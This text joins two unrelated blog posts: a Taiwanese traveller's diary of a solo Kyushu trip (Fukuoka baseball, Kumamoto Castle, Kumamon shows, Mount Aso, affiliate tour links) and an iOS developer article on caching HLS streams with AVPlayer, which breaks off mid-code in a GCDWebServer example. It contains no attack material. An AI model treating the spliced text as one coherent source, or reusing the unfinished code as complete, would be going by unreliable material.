When buying tickets, the elderly man at the counter got nervous and shaky because he couldn't understand a foreigner, which made me nervous too XD. In my confusion I picked the last row in the middle of the front viewing platform (with people on both sides), which turned out to be super awkward: I had to excuse myself all the way in and out, the seats were tiny, and I was squeezed in between Japanese fans without knowing a word of Japanese… I sat through the entire game stiffly and awkwardly.
Ticket price is almost $1,500 TWD, thinking I should have bought the cheapest lousy seat to watch comfortably on my own.
I must say the visual effects of the dome (very close to the baseball field), and the entire large screen animation display are very good.
The Fukuoka SoftBank Hawks' traditional cheer involves inflating balloons (with a manual pump) in the 7th inning and then releasing them; as for the litter… it's just left where it falls and cleaned up later.
The home team won 4:2 in the end. It was more exciting than the CPBL, with pitchers throwing around 145 km/h and both offense and defense in every inning, with very few three-up-three-down innings; the pace of the game was fast and comfortable to watch.
In terms of cheerleading squads, though, Taiwan still puts on a richer show than Japan.
Indoor fireworks are set off in the dome after a home victory, very cool!
Bought a SoftBank Hawks towel as a souvenir of the visit, also relieving the embarrassment of not being able to enter the Hanshin Tigers Koshien Baseball Stadium last time due to sold-out tickets.
The venue was crowded on the way out, but no one pushed and everyone walked slowly. I followed the crowd to the nearest subway station, Tōjinmachi, since the bus looked like a long wait.
Back to the hotel to rest and taste the seedless muscat grapes bought in the afternoon, very sweet, a bit too sweet.
Early in the morning, check out and stroll around the pharmacy near the hotel.
Found nothing special, had a McDonald’s breakfast (McMuffin with egg and iced Americano for $107) and came back to pick up luggage to take the JR to Kumamoto.
Finally said goodbye to this hotel. The lobby had Fukuoka SoftBank Hawks dolls, and a Taiwanese flag hung outside, which was quite striking since next door was a "friendship" convenience store run by Chinese owners with many Chinese customers.
Reserved seats at the station’s electronic machine. Thought it was a bit far, so reserved a seat with luggage.
Follow the instructions to reserve a seat:
If there are any issues, there are station staff you can ask. The train departing in 15 minutes had no seats left, so I had to book one departing in 45 minutes instead.
That turned out to be fine: walking from the Hakata Station gates around to the Shinkansen platform for Kagoshima (via Kumamoto) took about 10 minutes, so the earlier train would have been too rushed anyway.
Managed to use the JR Pass on the last day before it expired.
I was originally worried that my 27-inch suitcase (about 69 x 50 x 29 cm) wouldn't fit in the overhead rack and that I'd have to book a seat with the oversized-baggage area, which is required when the three sides add up to more than 160 cm.
Placed upright, the 27-inch suitcase was a bit tight and could block the neighboring seat; it sat stably on the overhead rack, but I still had to heave it up there. Booking a window seat was a worry since taking the luggage down might block the aisle; fortunately, a kind Japanese man offered to switch seats to make handling the luggage easier.
Upon arrival in Kumamoto, I saw a huge Kumamon, then transferred to the JR and the tram to drop my luggage at the hotel (Municipal Gymnasium-mae stop).
Kumamoto is full of Kumamon bears everywhere…
After settling in the hotel, took the tram to Kumamoto Castle (to Torichosuji Station).
You can first stop at Sakura-no-Baba Josaien below the castle to recharge (forgot to take photos); Kumamoto Castle tickets can be bought here. There aren't many people here, but up at the entrance of Kumamoto Castle you'll run into plenty of tour groups blocking the way.
Ticket options: Kumamoto Castle only, 800 yen; Kumamoto Castle + Wakuwaku-za (the historical and cultural experience hall behind the ticket gate), 850 yen; Kumamoto Castle + Wakuwaku-za + Kumamoto Museum, 1,100 yen.
I bought Kumamoto Castle + Wakuwaku-za, figuring it was only 50 yen more, but after looking around it was just average. It adds context for the exhibits inside Kumamoto Castle and earthquake-related artifacts, and is geared toward photos and hands-on experiences.
Kumamoto Castle's main keep has been restored and is open to the public (as of 2023), while other buildings are still being repaired (you can see the cranes).
The new addition is a skywalk directly planned to lead all the way to Kumamoto Castle.
After ascending the main tower, you can see the skywalk you walked along.
Overlooking the square in front of Kumamoto Castle and the historical sites still under continuous maintenance behind.
A model depicting the situation after the earthquake.
A souvenir shop next to the square houses a model of Kumamoto Castle, completing my mission of collecting the three major famous castles!
Returning to the ticket booth, I visited Wakuwaku-za; inside there are models of Kumamoto Castle and a Kumamoto Castle built out of LEGO, very cool.
Due to the unfavorable weather, I didn’t continue to the museum or Kato Shrine.
Walking back to Torichosuji Station, this is where Kumamoto's covered shopping arcade and the local Tsuruya Department Store are located. The first floor of the department store's east wing was completely renovated a few months ago to become Kumamon Square (Kumamon's office).
While wandering around the shopping street, I happened to come across a public event featuring Kumamon x Traffic Safety and received a Kumamon tote bag.
This area is not very interesting to explore; only Tsutaya Bookstore and the Muji building are worth visiting. When you get off at Kumamoto Station, you can feel that there are many elderly people and few young people. The local Tsuruya Department Store is mostly frequented by elderly people, selling mostly women’s clothing and household items, with fewer items for young people.
I bought some Kumamon merchandise at the Kumamon specialty store in Tsuruya Department Store, then went to the underground street of the department store to buy alcohol and food (dinner + supper) to eat back at the hotel.
The local Kumamoto sake recommended by the store ("fragrant dew") was sweet and smooth to drink, though I felt the rice flavor wasn't strong.
Green Rich Hotel Suizenji, 2023/09
The hotel deserves a mention. In the past I didn't pay much attention to reviews; anything around 3 stars or above was fine. This one's soundproofing is poor, and I ran into a whole floor of elementary-school graduation-trip kids, with doors slamming day and night for two days straight, very disturbing.
After checking the detailed reviews on Google/Agoda, I feel somewhat disheartened.
Poor soundproofing seems to be a common problem in old hotels, which I can tolerate (I brought earplugs myself); but as mentioned in previous reviews, the hotel’s WiFi is just a sham.
The WiFi signal is available throughout the hotel, but even with a full signal in the room, the speed is still very slow, websites won’t load, you have to stand by the door to get a normal internet speed, it’s almost like the hotel has no internet.
The price is not attractive either, it’s better to stay in Fukuoka, for the same price, you can stay at APA in Fukuoka.
After this experience, I now know that even for Japanese hotels, it’s important to check the reviews…
Apart from the convenience of being close to the airport, there are no other advantages, and there are no convenience stores nearby (you have to walk for more than 10 minutes to find one).
In the morning, I went straight across to Suizenji Jojuen Garden.
[_KKday Reference Itinerary: Kyushu Kumamoto Day Tour Aso Nakadake Volcano, Kusasenri, Kumamoto Castle, Suizenji Jojuen Garden/All-you-can-eat Seasonal Fruits Departing from Fukuoka Hakata (Chinese, English, Japanese)_](https://www.kkday.com/zh-tw/product/38965?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
It has a bit of a feeling of the Banqiao Lin Family Garden, very well maintained inside, clear water, a small Mount Fuji, Izumi Shrine, very fat koi, and a cat.
After visiting, take the streetcar to Suidōchō and head to Kumamon Square (which I'd found yesterday).
Inside, there are Kumamon Chief souvenirs for taking photos, and outside, there is a monitor to see what’s happening inside.
Since it was still early at 11 a.m., before the performance time, I went to find food at the neighboring Tsuruya Department Store.
You can refer to the performance schedule on the Kumamon Square official website (times may vary, but there are usually three performances on Saturdays).
Passing by the Tsuruya Department Store, I also found a Chief sadly playing the piano on the first floor.
I went to B1 to eat the locally famous Hachimitsu Manju, which is a thick wheel cake with either white bean or red bean filling, sweet lovers will love it, and it’s a great breakfast with coffee.
I returned to Kumamon Square just before 11 a.m. to wait for the performance. There's no need to draw lots anymore; as long as you enter before the show starts you can get in. If you're late you may have to watch the monitor outside; visitors with children can sit inside.
Before the performance, the house rules are explained: you cannot pat Kumamon; don't hold your camera too high (it blocks the view behind you); under Japanese law any faces captured must be pixelated; and everyone is welcome to upload to social media.
The performance lasts about 30 minutes. The hostess will help Kumamon speak (all in Japanese). The process is roughly to greet everyone, talk about interesting things in Kumamoto, dance (the above song is very catchy), and say hi to people from different countries (Taiwanese people are the majority here).
Kumamon is very cute and has big, interesting movements.
There are fewer peripheral products sold in the square, and the prices are relatively high, so I didn’t buy anything here.
After watching the performance until close to noon, I walked down the shopping arcade to eat at Katsuretsutei Shinshigai Honten; stepping outside the arcade, the surroundings suddenly jump from family-friendly to adults-only, with rows of "free information centers" (adult-entertainment guides) lining the street (the other side is Kumamoto's Ginza Street).
The super-thick, juicy pork cutlet rice is special because it comes with their pickled vegetables (shared, self-serve; remember to use the red chopsticks). Other than that, it's similar to eating Japanese tonkatsu in Taiwan. They give you a mortar and sesame seeds to grind for the sauce; rice, tea, soup, and cabbage are all free refills. I downed two bowls of rice in one go and felt very satisfied.
After eating and drinking, continue walking down the shopping street towards Hanabatake Square.
There happened to be an event at the square that Saturday, Food Summit 2023, with food stalls all around and a stage in the middle for performances.
I bought a glass of sparkling wine and a grilled sausage to sit down and watch the performance. The sausage wasn’t as fragrant and delicious as in Taiwan.
Halfway through eating, something fell from above, which was a bit scary, but it added to the atmosphere. Later, it got too hot, so after eating, I left and went to the Sakuramachi Shopping Center to browse the department store.
Hanabatake Square seems to have events every weekend. You can check before coming. Next week is the Taiwan Festival!
On the top floor, there is a waving Kumamon, and on the second floor, there are also Kumamon merchandise for sale (I think it’s the most complete).
There are also Kumamon performances here, so check the announcement for the schedule.
You can go up the outside stairs all the way to the top floor to find the waving Kumamon. This building also serves as the Kumamoto Bus Center downstairs, where you can buy tickets on the second floor to go to other cities.
There is a large garden on the rooftop, a pool for playing in the water, and children can go up to play.
You can also take the escalator from inside to go up. From the third floor’s Josaien (this Josaien is completely empty), you can find the escalator mentioned online.
Personally, I think the Sakuramachi Shopping Center is better and more enjoyable than the Tsuruya Department Store.
The Sakuramachi Shopping Center is next to the Kumamoto Prefectural Products Hall. In addition to Kumamoto’s specialties, there are also some Kumamon-related products (e.g., Kumamon incense burner XD).
I walked through the Up+Down Shotengai again on the way back.
I bought clothes and miscellaneous items at Muji, and replenished my skincare products at Matsumoto Kiyoshi (for some reason, my Visa card doesn’t work at Matsumoto Kiyoshi, I had issues in Tokyo before, and this time in Kumamoto, I could only use Japanese yen in cash).
When I arrived at the hotel in the evening, I had dinner at Lawson on the way and went to bed early to prepare for visiting Mount Aso tomorrow!
[_KKday Reference Itinerary: [One-person group, daily departure] Japan Kumamoto Day Tour Kumamoto Castle & Mount Aso Volcano Crater & Kusasenri (including Health Buffet All-you-can-eat) Departing from Fukuoka_](https://www.kkday.com/zh-tw/product/21811-kumamoto-tour-josaien-mount-aso-kumamoto-castle-hot-spring-japan?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
I left early and walked to the bus stop to take the intercity bus to Aso Station; I met Kumamon while waiting for the bus.
We will pass by Aso Airport (I will be there the day after tomorrow Orz).
On the way, when entering the area of Mount Aso, the bus will introduce Mount Aso and play local mountain songs for you to imagine strolling on the grasslands of Mount Aso together.
Upon arrival at Aso Station, there is a statue of Usopp from One Piece outside the station for photos (I forgot to take one).
You can buy a one-day pass for Mount Aso at the vending machine here (probably a few hundred yen cheaper) and get the timetable. The one-day pass is only valid for boarding and alighting at the three stations on the timetable. You need to draw a boarding ticket when boarding; it seems that it cannot be used at other stations.
I will take the No. 8 route, the bus to go up the mountain at 10:45.
Time to go up the mountain: about 40 minutes.
There weren't too many people; after a short wait in line it was boarding time and everyone got on. For safety on the mountain road there are no standing passengers, and if you're prone to motion sickness you may want to bring medication.
There is also a helicopter experience tour in Aso, where you can directly take a helicopter to see the volcano, those interested can check it out.
Kami-komezuka
When you go up the mountain, you will pass through Kusasenri before reaching the mountain terminal. From the mountain terminal, take another bus for about 10 minutes to reach the summit of the mountain.
Coincidentally, I met someone from the industry, a TSMC engineer who was also traveling alone (tacked onto a business trip XD). It was the first time in Aso for both of us, so we decided to explore together.
At the mountain terminal, we were too lazy to wait for the bus, so we chose to walk up the mountain (about 15-20 minutes).
Walking to the mountain square, you will reach the fourth crater of Aso Nakadake.
Having a travel companion makes taking photos much easier!
The mountain top is cool and not hot at all, filled with the smell of sulfur. If you have any health conditions like in picture three, consider your physical condition.
We didn’t make it all the way to the Aso Nakadake crater, just went up to take a look and then descended the mountain.
Side Story
After chatting happily all the way down, we didn’t pay attention to the bus direction, and when it was about to leave, we hurried to get on, only to be taken back up again. So, we had to walk back down XD
At the mountain terminal, we made sure to take the No. 8 bus (the No. 8 bus, the No. 8 bus, it bears repeating) heading downhill toward Aso Station, and got off at Kusasenri.
Enjoyed the famous akaushi (red beef) bowl; the place was crowded but had plenty of seating, and the food came out quickly with almost no waiting.
After eating, we strolled around Kusasenri (with a bit of Grand Canyon vibe), where there were horse riding activities.
Afterwards, we took the same No. 8 bus back to Aso Station, retracing our route downhill.
When we arrived at Aso Station, the JR train toward Aso Shrine (Miyaji Station) was departing in three minutes; if we missed it, we would have to wait another hour. We ran for it, only to find that Aso is a small station with no electronic payment, so we had to rush to buy tickets from the vending machine before boarding.
Aso Station has only one platform, so you can board without much hassle. Later, we found out that if you really don’t have time to buy a ticket, you can board first and then purchase one when you get off.
After getting off at Miyaji Station, it took about 20 minutes of walking to reach Aso Shrine (straight ahead, but a bit far).
On the way, we encountered the wild Kumamon bear.
The shrine is not very big, and we finished paying our respects quickly; part of the shrine was also under maintenance.
After leaving, there was a small shopping street nearby where you could buy some snacks and take a short break.
Thanks to my colleague for treating me to fried beef and potato cakes.
After finishing the visit, we started walking back slowly. We originally planned to take the 15:47 JR train back to Kumamoto, but when we got back to Miyaji Station we found it was a reserved-seat-only train and every seat was sold out, so we couldn't board.
Attached is the timetable; do check the schedule first, otherwise you might end up like us, waiting an hour for the next local JR train back to Kumamoto at 16:35.
Since there was still plenty of time, we walked back and strolled around Matsumoto on the way. (It’s actually quite far, about 10 minutes).
Finally, we took a last look at the peaceful Aso.
The local train slowly made its way back to Kumamoto, taking about 1 hour and 45 minutes to arrive.
There is a section of the route that zigzags and involves reversing, so don’t worry, you’re on the right train!
Back at Kumamoto Station, I said goodbye to my travel companion, hoping we'll meet again someday.
We explored the newly opened AMU PLAZA KUMAMOTO department store at Kumamoto Station (larger and more diverse than the Sakuramachi Shopping Center) and the nearby Higo Market (selling food).
We also found many Kumamon mascots XD.
We had a casual dinner at the food street, tried the Miyazaki chicken (ordinary), toured the entire building, bought some late-night snacks, and Kumamoto-produced strawberry wine (tasted good, planning to bring back to Taiwan) before returning to the hotel.
There was a unique store called “BIWAN Beauty Bay” selling Taiwanese products (even saw some “Gua Gua” snacks XD), and upon checking, it’s opened by Taiwan’s Ayuan Soap.
While researching, I found a cool website - https://kumataiwanlife.com/ - which provides the latest news, events, and fun facts about Kumamoto in Chinese (e.g., Kumamoto’s “OK Band-Aid” is called “LIBATAPE”).
Today, I discovered that the vending machines at the hotel actually sell canned cola, which I couldn’t find in the major convenience stores.
It’s a collaboration between Suntory and Pepsi, not available in Taiwan. It’s made like draft beer but for cola, very fizzy, not too syrupy, unlike regular cola that I usually can’t finish due to being too sweet, but I could finish this draft cola!
After a satisfying meal, we went to bed early, preparing to welcome the last day in Kumamoto (excluding the day of the return flight).
The third day in Kumamoto was quite boring as we had already visited all the attractions. We tried to find some places to explore and buy souvenirs and cosmetics.
I originally planned to go to Shimabara City, but the journey was too far (2 hours and 45 minutes one way), and my JR Pass had expired. I would have to spend more money on a long-distance bus ticket, so I gave up. Oita and Yufuin were also too far, so I gave up. I was too lazy to go to Minami Aso Village, so I left it for next time. Therefore, I wandered around the city and did some shopping, taking it slow.
Early in the morning, I went to the Teramachi Street and visited the Kumamoto Inari Shrine that I didn’t get to visit on the first day.
I walked further back to the Katō Shrine (it’s quite far, about a 20-minute walk with a hilly road).
Turning up the hill, you will reach the Katō Shrine. From there, you can also see the area under repair that I saw from the castle tower on the first day, with many scattered walls waiting to be restored one by one.
It’s small, and half of it is still under repair.
There was a small Kumamoto earthquake donation box. I didn’t offer prayers at the Katō Shrine; instead, I donated to the box.
From here, you can see Kumamoto Castle from the back.
After returning, I went to the Kumamoto City Hall (the 14th floor has a free observation deck). The walk from the Katō Shrine to the city hall is quite far, so you can take a bus.
I originally planned to visit the Kumamoto Art Museum, Craft Museum, etc., but they were all closed on Mondays!
From the 14th floor of the Kumamoto City Hall, you can overlook the entire city, including Kumamoto Castle.
Coming out of the city hall, walk towards the Sakuramachi Shopping Center. You will pass by a pedestrian bridge, which is a great spot for photos, capturing the Kumamoto street and subway.
This intersection is Kumamoto Ginza Street, where there are also free information centers.
I went back to the Sakuramachi Shopping Center for shopping, had another meal of Miyazaki beef with Kumamoto beer, and bought a Kumamon daifuku as a souvenir to bring back to Taiwan (so cute).
I walked back from Shimo-tori to Kami-tori to return to Teramachi Street, stopping by Don Quijote for shopping (the duty-free counter is on the second floor for payment).
After shopping, I decided to head back to the hotel to rest and drop off my things.
Side Note On the tram, I met some cute elderly people from Kumamoto. Pointing to the transparent bag of duty-free instant noodles, they said, “Sukoshi ikkai,” and I replied, “Good! Good!” Then, I showed them the Kumamon daifuku I had just bought and said, “Kawaii ne~” They gave a thumbs up and said, “Kawaii, arigato.” I then said, “I am Taiwanese,” and the elderly lady seemed to greet me in Japanese (my Japanese is too poor to understand, I only caught something about genki). I responded politely, and when I got off, I bid them goodbye.
Upon returning to the hotel and opening the curtains for the first time, I found the Suizenji–Ezu Lake basin right behind; the scenery was actually quite nice, and you could hear insects at night.
After resting for a while in the afternoon with nowhere else to go, I randomly visited some spots on the map.
Walked to the front of the Kumamoto Prefectural Government first to find the Luffy statue.
Took a bus and walked to Kengun Shrine; a small shrine, almost no one there as it was close to closing time.
There was no direct bus here, had to walk a short distance (about 15 minutes); after leaving the shrine, continued walking towards “Kumamoto Zoo” (about 20-30 minutes) to find the Chopper statue.
Saw a Sergeant Frog manhole cover on the way (seems to be from a previous event).
Found the Chopper statue at the entrance of the zoo.
Checked beforehand that Kumamoto Zoo seemed quite boring, so didn’t specifically plan to go in; it was already closed in the evening.
Side Story: I met a Taiwanese family at the zoo entrance who wanted a photo taken, so I helped them; the next day at the airport I ran into them again and took another photo with them and the airplane. The little brother called me the "photo-taking big brother" XD.
Continued following the map to Ezu Lake Park in the Suizenji–Ezu Lake area and had a look on the way; it turned out to be just a riverside park where locals exercise, so I took a bus directly back to the hotel (or the bus terminal).
Had dinner at an izakaya near Shin-Suizenji Station.
Dined with former colleagues (from a tech company, later worked at Books.com and appeared on the cover of Line News, a.k.a. Books.com Goddess Irene Yu).
It was so touching to have dinner with familiar people in a different place, especially since I had been quite withdrawn for several days (not understanding Japanese, hardly speaking), and in the end, I even received a Beppu souvenir 😭.
Ate too quickly, only remembered the chicken wings were delicious, also tried the horse meat skewers (Kumamoto horse sashimi is famous, but I was too scared to try); the landlady was very friendly, but the menu was all in Japanese, and the font was hard to decipher with translation software, so I could only guess XD.
After dinner, I walked back to the hotel (about 15 minutes), then strolled through the streets of Kumamoto and bought ice cream and sweet sake (amazake) at Lawson and FamilyMart (I thought it was alcoholic, but it turns out amazake is a nourishing summer drink).
Also bought breakfast for the next morning (melon bread + juice) and this fruit juice with pulp from FamilyMart (melon, strawberry…) was really delicious, I almost always bought it when I saw it, the pulp inside was sweet and tasty.
Upon disembarking the plane, I noticed the person in front of me was wearing a helmet. Are they riding a motorcycle to take a flight? 🤣
Arrived at Taoyuan Airport, heading home!
When picking up luggage, there was a slight delay possibly due to early check-in; had to wait a bit before it arrived. Also tested the Airtag locating feature, it made a sound when the luggage was close!
Back in Taiwan, saw Kumamon on the road again XD (seems to be a new card promotion for E.SUN Bank).
Bus Riding Rules in Japan: Don’t Worry About Taking the Bus! Complete Guide
That concludes the entire record of my 10-day solo trip to Kyushu, with summaries/Retro written earlier. Thank you for reading.
[Japan JR PASS | Kyushu Area Rail Pass | Northern Kyushu & Southern Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/zh-tw/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki, Japan | Huis Ten Bosch Ticket](https://www.kkday.com/zh-tw/product/3988-japan-nagasaki-huis-ten-bosch-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki Day Tour | Glover Garden, Oura Tenshudo & Nagasaki Atomic Bomb Museum, Peace Park & Inasayama Night View (One of the World’s Top Three Night Views/Includes Round-Trip Cable Car) | Optional Huis Ten Bosch Fireworks Plan | Departing from Fukuoka/Chinese Group](https://www.kkday.com/zh-tw/product/152195-nagasaki-tour-saga-yutoku-inari-shrine-fukuoka-japan?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
How to achieve caching while playing m3u8 streaming video files using AVPlayer
Photo by Mihis Alex
I have open-sourced my previous implementation, and those in need can use it directly.
HTTP Live Streaming (HLS) is a streaming media network transmission protocol based on HTTP proposed by Apple.
For example, when playing music, in a non-streaming situation, we use mp3 as the music file. The larger the file, the longer it takes to download completely before it can be played. HLS, on the other hand, splits a file into multiple small files, playing as it reads. So, once the first segment is received, playback can start without downloading the entire file!
The `.m3u8` file records the bitrate, playback order, duration, and other information for the segmented `.ts` files. It can also support encryption/decryption protection, low-latency live streaming, and more.

Example of an `.m3u8` file (aviciiwakemeup.m3u8):
```
#EXTM3U
#EXT-X-VERSION:3
#EXT-X-ALLOW-CACHE:YES
#EXT-X-TARGETDURATION:10
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:9.900411,
aviciiwakemeup-00001.ts
#EXTINF:9.900400,
aviciiwakemeup-00002.ts
#EXTINF:9.900411,
aviciiwakemeup-00003.ts
#EXTINF:9.900411,
.
.
.
#EXTINF:6.269389,
aviciiwakemeup-00028.ts
#EXT-X-ENDLIST
```
*EXT-X-ALLOW-CACHE was deprecated in iOS ≥ 8 / Protocol Ver. 7; whether this line is present or not makes no difference.
For a streaming media service, caching is extremely important, because each audio file can range from a few MB to several GB. If every replay had to fetch the file from the server again, it would put a heavy load on the server, and the traffic costs real money ($$$). A cache layer saves the service a lot of money, and users don't waste bandwidth and time re-downloading; it's a win-win mechanism (but remember to set limits and clear the cache periodically so it doesn't fill up the user's device).
In the past, when not dealing with streaming, handling mp3/mp4 was straightforward: download the file to the device before playing, and start playback only after the download is complete. Since the file has to be fully downloaded before playback anyway, we might as well use URLSession to download the file and then feed the local file path (file://) to AVPlayer for playback. Alternatively, the formal way is to use AVAssetResourceLoaderDelegate to cache the downloaded data in the delegate methods.
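As a rough illustration of that non-streaming flow, here is a minimal sketch (URL handling and file naming are simplified placeholders) that downloads a file with URLSession and only then hands the local file:// path to AVPlayer:

```swift
import AVFoundation

final class SimpleAudioDownloader {
    private var player: AVPlayer?

    // Non-streaming case: download the whole file first, then play it from disk.
    func downloadAndPlay(remoteURL: URL) {
        let task = URLSession.shared.downloadTask(with: remoteURL) { [weak self] tempURL, _, error in
            guard let tempURL = tempURL, error == nil else { return }

            // Move the finished download into Caches so it doubles as a local cache for replays.
            let cachesDirectory = FileManager.default.urls(for: .cachesDirectory, in: .userDomainMask)[0]
            let localURL = cachesDirectory.appendingPathComponent(remoteURL.lastPathComponent)
            try? FileManager.default.removeItem(at: localURL)
            try? FileManager.default.moveItem(at: tempURL, to: localURL)

            DispatchQueue.main.async {
                // AVPlayer happily accepts a file:// URL for mp3/mp4.
                self?.player = AVPlayer(url: localURL)
                self?.player?.play()
            }
        }
        task.resume()
    }
}
```

The AVAssetResourceLoaderDelegate route mentioned above achieves the same thing more formally and can feed data to the player progressively, at the cost of more plumbing.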
For streaming, the idea is also quite straightforward: first read the `.m3u8` file, then parse the information inside and cache each `.ts` file. However, implementing this turned out to be more complicated than I imagined, which is why this article exists!
For playback, we still use iOS AVFoundation’s AVPlayer directly. There is no difference in operation between streaming and non-streaming files.
Example:
```swift
let url: URL = URL(string: "https://zhgchg.li/aviciiwakemeup.m3u8")!
var player: AVPlayer = AVPlayer(url: url)
player.play()
```
We decided to revert to using mp3 files, so we can implement it directly with AVAssetResourceLoaderDelegate; for the detailed implementation, refer to "AVPlayer Streaming Cache Implementation".
Several solutions to achieve our goal and the issues encountered during implementation.
The first thought was to follow the same approach as with mp3/mp4 files: use AVAssetResourceLoaderDelegate and cache the `.ts` files in the delegate methods.
Unfortunately, this approach doesn't work, because we can't intercept the download requests for the `.ts` files in the delegate; this is confirmed in this Q&A and the official documentation.
For AVAssetResourceLoaderDelegate implementation, refer to “AVPlayer Streaming Cache Implementation”.
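For context, this is roughly how an AVAssetResourceLoaderDelegate gets wired up in the non-HLS case (the class name and scheme are illustrative); as noted above, the HLS `.ts` requests never reach this delegate, which is why the approach fails here:

```swift
import AVFoundation

final class CachingResourceLoader: NSObject, AVAssetResourceLoaderDelegate {
    // Invoked only for custom-scheme URLs; plain http/https requests bypass the delegate entirely.
    func resourceLoader(_ resourceLoader: AVAssetResourceLoader,
                        shouldWaitForLoadingOfRequestedResource loadingRequest: AVAssetResourceLoadingRequest) -> Bool {
        // A real implementation responds with cached bytes via loadingRequest.dataRequest?.respond(with:)
        // and calls loadingRequest.finishLoading(), or fetches from the network first and caches the result.
        return true
    }
}

// Usage: point the asset at a custom scheme so the delegate actually gets called.
let loader = CachingResourceLoader()
let asset = AVURLAsset(url: URL(string: "cache://zhgchg.li/aviciiwakemeup.mp3")!)
asset.resourceLoader.setDelegate(loader, queue: DispatchQueue(label: "resource.loader.queue"))
let player = AVPlayer(playerItem: AVPlayerItem(asset: asset))
```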
URLProtocol is a method I recently learned. All requests based on the URL Loading System (URLSession, API calls, image downloads, etc.) can be intercepted to modify the Request and Response before returning them, making it seem like nothing happened. For more on URLProtocol, refer to this article.
Using this method, we planned to intercept AVFoundation AVPlayer's requests for `.m3u8` and `.ts` files: if there is a local cache, return the cached data directly; otherwise, send the request out. This would achieve our goal.
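A minimal sketch of the intended interceptor, just to show the shape of a URLProtocol subclass (the class name and the URLCache-based lookup are illustrative placeholders, not the real implementation):

```swift
import Foundation

final class HLSCacheURLProtocol: URLProtocol {
    // Only take over .m3u8 / .ts requests; everything else passes through untouched.
    override class func canInit(with request: URLRequest) -> Bool {
        let path = request.url?.path ?? ""
        return path.hasSuffix(".m3u8") || path.hasSuffix(".ts")
    }

    override class func canonicalRequest(for request: URLRequest) -> URLRequest { request }

    override func startLoading() {
        if let cached = URLCache.shared.cachedResponse(for: request) {
            // Cache hit: hand the stored response straight back to the client.
            client?.urlProtocol(self, didReceive: cached.response, cacheStoragePolicy: .allowed)
            client?.urlProtocol(self, didLoad: cached.data)
            client?.urlProtocolDidFinishLoading(self)
        } else {
            // Cache miss: a real implementation would fetch with URLSession here,
            // store the result, and then relay it to the client.
            client?.urlProtocol(self, didFailWithError: URLError(.resourceUnavailable))
        }
    }

    override func stopLoading() {}
}

// Registration; only requests that actually go through the URL Loading System will hit this class.
URLProtocol.registerClass(HLSCacheURLProtocol.self)
```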
Again, unfortunately, this approach doesn't work either, because AVFoundation AVPlayer's requests do not go through the URL Loading System, so we can't intercept them. *Some say it works on the simulator but not on a real device.
Based on Solution 2.1, a brute-force idea: if I change the request URL to a custom scheme (e.g., streetVoiceCache://), AVFoundation won't know how to handle the request and will throw it out to the system, allowing our URLProtocol to intercept it and do whatever we want.
```swift
let url: URL = URL(string: "streetVoiceCache://zhgchg.li/aviciiwakemeup.m3u8?originScheme=https")!
var player: AVPlayer = AVPlayer(url: url)
player.play()
```
URLProtocol will intercept streetVoiceCache://zhgchg.li/aviciiwakemeup.m3u8?originScheme=https; at this point we just restore it to the original URL, send a URLSession request to fetch the data, and handle the cache ourselves. The `.ts` file requests inside the m3u8 will also be intercepted by URLProtocol, and we can handle their cache the same way.
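Restoring the original URL inside the protocol is plain URL manipulation; a small sketch using URLComponents, following the custom scheme and query key from the example above:

```swift
import Foundation

// Turn "streetVoiceCache://host/path?originScheme=https" back into "https://host/path".
func restoreOriginalURL(from interceptedURL: URL) -> URL? {
    guard var components = URLComponents(url: interceptedURL, resolvingAgainstBaseURL: false) else { return nil }
    let originScheme = components.queryItems?.first(where: { $0.name == "originScheme" })?.value ?? "https"
    components.scheme = originScheme
    components.queryItems = components.queryItems?.filter { $0.name != "originScheme" }
    if components.queryItems?.isEmpty == true { components.queryItems = nil }
    return components.url
}
```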
Everything seemed perfect, but when I excitedly Build-Run the APP, Apple slapped me in the face:
Error: 12881 “CoreMediaErrorDomain custom url not redirect”
It doesn't accept the Response Data I provide for the `.ts` file requests. I can only use the `urlProtocol(_:wasRedirectedTo:redirectResponse:)` client method to redirect back to the original https request so playback works normally; even if I download the `.ts` file locally first and redirect to that file:// path, it still isn't accepted. Checking the official forum revealed that this approach is simply not allowed: an `.m3u8` can only originate from http/https (so even if you put the entire `.m3u8` and all of its segmented `.ts` files locally, you can't play them with AVPlayer via file://), and `.ts` data cannot be supplied through URLProtocol.
fxxk…
Implementation is the same as Solution 2.2, feeding AVPlayer a custom Scheme to enter AVAssetResourceLoaderDelegate; then we handle it ourselves.
Same result as 2.2:
Error: 12881 “CoreMediaErrorDomain custom url not redirect”
Official forum gave the same answer.
It can be used for decryption processing (refer to this article or this example) but still cannot achieve Cache functionality.
This method is the most commonly suggested solution when searching for ways to cache HLS: set up an HTTP server inside the app to act as a reverse proxy server.
The principle is simple. Run an HTTP server in the app, say on port 8080, so the base URL is `http://127.0.0.1:8080/`; then we can handle the incoming requests ourselves and decide what to respond with.
Applying this to our case, change the request URL to: `http://127.0.0.1:8080/aviciiwakemeup.m3u8?origin=http://zhgchg.li/`.
In the HTTP server's handler, intercept and handle `*.m3u8`: when a request comes in, it enters our handler and we can do whatever we want and control what data to respond with. The `.ts` file requests will also come in, and this is where we can implement the cache mechanism we want.
To AVPlayer, it's just a standard http:// `.m3u8` streaming audio file, so there won't be any issues.
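A rough sketch of that reverse-proxy idea with GCDWebServer (the handler logic, the in-memory cache type, and the origin query parameter are simplified illustrations, not a production implementation):

```swift
import GCDWebServer

// Hypothetical in-memory cache used only for this sketch; a real one would persist .ts segments to disk.
final class HLSSegmentCache {
    static let shared = HLSSegmentCache()
    private var storage: [URL: Data] = [:]
    func data(for url: URL) -> Data? { storage[url] }
    func store(_ data: Data, for url: URL) { storage[url] = data }
}

let webServer = GCDWebServer()

// Every request (both the .m3u8 and the .ts segments) lands here.
webServer.addDefaultHandler(forMethod: "GET",
                            request: GCDWebServerRequest.self) { request -> GCDWebServerResponse? in
    // Rebuild the real URL from the "origin" query parameter plus the requested path.
    guard let origin = request.query?["origin"],
          let originURL = URL(string: origin),
          let remoteURL = URL(string: request.path, relativeTo: originURL)?.absoluteURL else {
        return GCDWebServerResponse(statusCode: 400)
    }

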